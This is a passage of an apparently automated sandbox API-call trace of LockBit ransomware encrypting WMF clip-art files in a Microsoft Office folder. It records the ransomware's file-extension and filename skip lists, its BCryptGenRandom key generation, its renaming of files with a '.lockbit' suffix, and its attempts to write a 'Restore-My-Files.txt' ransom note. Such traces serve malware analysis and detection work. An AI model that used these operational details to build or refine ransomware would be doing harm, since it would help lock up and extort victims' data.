Office\\CLIPART\\PUB60COR\\NA02041_.WMF") returned=".WMF" [0163.100] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.100] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.100] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.101] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.102] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF.lockbit") returned 72 [0163.102] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02041_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0163.103] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.103] malloc (_Size=0x40068) returned 0x3ef0008 [0163.103] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2328) returned 1 [0163.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0163.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0163.104] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0163.108] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.108] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.108] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.110] free (_Block=0x1fa2ed8) [0163.110] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02041_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.110] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.110] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.110] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb82d6100, ftCreationTime.dwHighDateTime=0x1bd4bfe, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb82d6100, ftLastWriteTime.dwHighDateTime=0x1bd4bfe, nFileSizeHigh=0x0, nFileSizeLow=0x43c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02066_.WMF", cAlternateFileName="")) returned 1 [0163.110] lstrcmpiW (lpString1=".", lpString2="NA02066_.WMF") returned -1 [0163.110] lstrcmpiW (lpString1="..", lpString2="NA02066_.WMF") returned -1 [0163.110] PathFindExtensionW (pszPath="NA02066_.WMF") returned=".WMF" [0163.110] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.110] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.111] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.111] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.112] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02066_.WMF") returned 1 [0163.112] lstrcmpiW (lpString1="ntldr", lpString2="NA02066_.WMF") returned 1 [0163.112] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02066_.WMF") returned 1 [0163.112] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02066_.WMF") returned -1 [0163.112] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02066_.WMF") returned -1 [0163.112] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02066_.WMF") returned 1 [0163.112] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02066_.WMF") returned -1 [0163.112] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.112] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF") returned=".WMF" [0163.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.113] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.113] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.114] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.114] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.114] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.114] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.114] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF.lockbit") returned 72 [0163.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02066_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0163.119] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.119] malloc (_Size=0x40068) returned 0x3f70048 [0163.119] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1084) returned 1 [0163.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0163.120] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.120] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0163.120] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0163.122] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.122] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.122] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0163.124] free (_Block=0x1fa2ed8) [0163.124] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02066_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.124] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.124] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3552d900, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3552d900, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x474, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02091_.WMF", cAlternateFileName="")) returned 1 [0163.124] lstrcmpiW (lpString1=".", lpString2="NA02091_.WMF") returned -1 [0163.124] lstrcmpiW (lpString1="..", lpString2="NA02091_.WMF") returned -1 [0163.124] PathFindExtensionW (pszPath="NA02091_.WMF") returned=".WMF" [0163.124] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0163.124] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0163.125] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0163.125] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02091_.WMF") returned 1 [0163.126] lstrcmpiW (lpString1="ntldr", lpString2="NA02091_.WMF") returned 1 [0163.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02091_.WMF") returned 1 [0163.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02091_.WMF") returned -1 [0163.126] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02091_.WMF") returned -1 [0163.126] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02091_.WMF") returned 1 [0163.126] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02091_.WMF") returned -1 [0163.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0163.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF") returned=".WMF" [0163.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0163.126] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0163.126] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0163.127] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0163.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF.lockbit") returned 72 [0163.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02091_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0163.128] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0163.128] malloc (_Size=0x40068) returned 0x3d70450 [0163.128] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1140) returned 1 [0163.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0163.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0163.129] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0163.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.193] malloc (_Size=0xa6) returned 0x1fa2ed8 [0163.193] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0163.193] free (_Block=0x1fa2ed8) [0163.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02091_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0163.193] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0163.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0163.193] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e66000, ftCreationTime.dwHighDateTime=0x1bd4bf3, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x38e66000, ftLastWriteTime.dwHighDateTime=0x1bd4bf3, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02092_.WMF", cAlternateFileName="")) returned 1 [0163.193] lstrcmpiW (lpString1=".", lpString2="NA02092_.WMF") returned -1 [0163.194] lstrcmpiW (lpString1="..", lpString2="NA02092_.WMF") returned -1 [0163.194] PathFindExtensionW (pszPath="NA02092_.WMF") returned=".WMF" [0163.194] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0163.194] lstrcmpiW (lpString1=".ani", 